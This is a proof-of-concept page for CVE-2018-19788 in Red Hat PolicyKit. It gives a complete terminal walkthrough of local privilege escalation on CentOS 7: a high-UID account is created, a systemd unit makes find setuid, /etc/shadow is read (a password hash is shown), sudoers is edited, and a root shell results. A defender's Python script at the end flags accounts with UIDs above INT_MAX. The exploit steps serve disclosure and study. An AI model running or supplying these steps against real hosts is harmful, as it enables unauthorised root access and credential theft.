
CVE-2018-19788 PoC — Red Hat PolicyKit Input Validation Error Vulnerability

Source
Associated Vulnerability
Title: Red Hat PolicyKit Input Validation Error Vulnerability (CVE-2018-19788)
Description: Red Hat PolicyKit (Polkit) is a tool from the US company Red Hat for controlling application privileges on Unix-compatible systems. It provides modern desktops with a central framework for authorizing ordinary applications to perform privileged work. A security vulnerability exists in Red Hat PolicyKit version 0.115. An attacker can exploit this vulnerability to execute arbitrary systemctl commands.
Description
Exploiting The CVE-2018-19788 PolicyKit Bug
Readme
# CVE-2018-19788
Exploiting The CVE-2018-19788 PolicyKit Bug

Steps to exploit the PolicyKit bug on a fully patched CentOS 7 installation.

[root@centos7 ~]# groupadd -g 4000000000 cve201819788  
[root@centos7 ~]# useradd -m -c "User With High UID" -u 4000000000 -g 4000000000 -s /bin/bash cve201819788  
[root@centos7 ~]# id cve201819788  
 uid=4000000000(cve201819788) gid=4000000000(cve201819788) groups=4000000000(cve201819788)  
[root@centos7 ~]# cat >hacked.service<<HACKED  
[Unit]  
Description=Hacked Service  
 
[Service]  
Type=notify  
ExecStart=/bin/bash -c "chmod +s /usr/bin/find"  
KillMode=process  
Restart=on-failure  
RestartSec=60s  
 
[Install]  
WantedBy=multi-user.target  
HACKED  

[root@centos7 ~]# systemctl link $(pwd)/hacked.service  
Created symlink from /etc/systemd/system/hacked.service to /root/hacked.service.  
[root@centos7 ~]# su - cve201819788  
[cve201819788@centos7 ~]$ whoami  
cve201819788  
[cve201819788@centos7 ~]$ grep root /etc/shadow  
grep: /etc/shadow: Permission denied  
[cve201819788@centos7 ~]$ systemctl start hacked  
 
 (pkttyagent:12785): GLib-GObject-WARNING **: 21:08:45.965: value "-294967296" of type 'gint' is invalid or out of range for property 'uid' of type 'gint' **    
 ERROR:pkttyagent.c:146:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)  

[cve201819788@centos7 ~]$ ls -l $(which find)  
-rwsr-sr-x. 1 root root 199304 Oct 30 12:42 /bin/find  
[cve201819788@centos7 ~]$ find /etc/shadow -exec grep root {} \;  
root:$6$/zGjAAFHb.RUQJPx$qJH5DgIrZ1avYAeceWPNKitAbyGxMQ6vaOL7MfJ84mrwU6xgOxr/4hpQqdNWQiX6nBgu9WUKqWrJ4t6zRFbIN1::0:99999:7:::  
[cve201819788@centos7 ~]$ find /etc/sudoers -exec visudo -f {} \;  

## Insert following into sudoers file  
cve201819788    ALL=(ALL)       ALL  
##  

[cve201819788@centos7 ~]$ sudo -l  
[sudo] password for cve201819788:   
Matching Defaults entries for cve201819788 on centos7:  
     !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1  
     PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER  
     LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin  
 
 User cve201819788 may run the following commands on centos7:  
     (ALL) ALL  
 [cve201819788@centos7 ~]$ sudo su -  
 Last login: Sun Dec 30 20:59:54 EST 2018 from 192.168.1.2 on pts/0  
 [root@centos7 ~]# whoami  
 root  
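The GLib warning in the transcript shows why the bug fires: uid 4000000000 does not fit in a 32-bit signed `gint`, so pkttyagent reads it as -294967296 and its `uid >= 0` assertion fails. The following is an added defender's check, not code from the PoC repository: it scans passwd-format records for accounts whose UID or GID exceeds INT_MAX (the precondition for this bug) and reports the value the C cast would produce. The sample records are constructed; pass a real `/etc/passwd` path as the first argument to scan a host.

```python
# Added defender's check (not part of the PoC repository): scan passwd-style
# records for UIDs/GIDs above INT_MAX, the precondition for CVE-2018-19788.
import struct

INT_MAX = 2**31 - 1   # largest value a C 'gint' (32-bit signed) can hold

# Constructed sample in /etc/passwd format; the last record mirrors the
# account created in the PoC transcript above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
nobody:x:65534:65534:Nobody:/:/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
cve201819788:x:4000000000:4000000000:User With High UID:/home/cve201819788:/bin/bash
"""


def as_gint(value):
    """Reinterpret an unsigned 32-bit uid_t as a signed 32-bit gint (C cast)."""
    return struct.unpack("<i", struct.pack("<I", value & 0xFFFFFFFF))[0]


def parse_passwd(text):
    """Yield (name, uid, gid) for each well-formed passwd record."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            continue
        try:
            yield fields[0], int(fields[2]), int(fields[3])
        except ValueError:
            continue  # skip malformed numeric fields


def find_high_uid_accounts(text):
    """Return [(name, uid, gid, uid_as_gint)] for accounts whose uid or gid > INT_MAX."""
    hits = []
    for name, uid, gid in parse_passwd(text):
        if uid > INT_MAX or gid > INT_MAX:
            hits.append((name, uid, gid, as_gint(uid)))
    return hits


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for name, uid, gid, gint in find_high_uid_accounts(text):
        print(f"{name}: uid={uid} gid={gid} (uid as gint: {gint})")
```

Any account reported here should be removed or re-numbered until polkit is updated, since the wrapped uid is exactly the value the transcript shows pkttyagent rejecting.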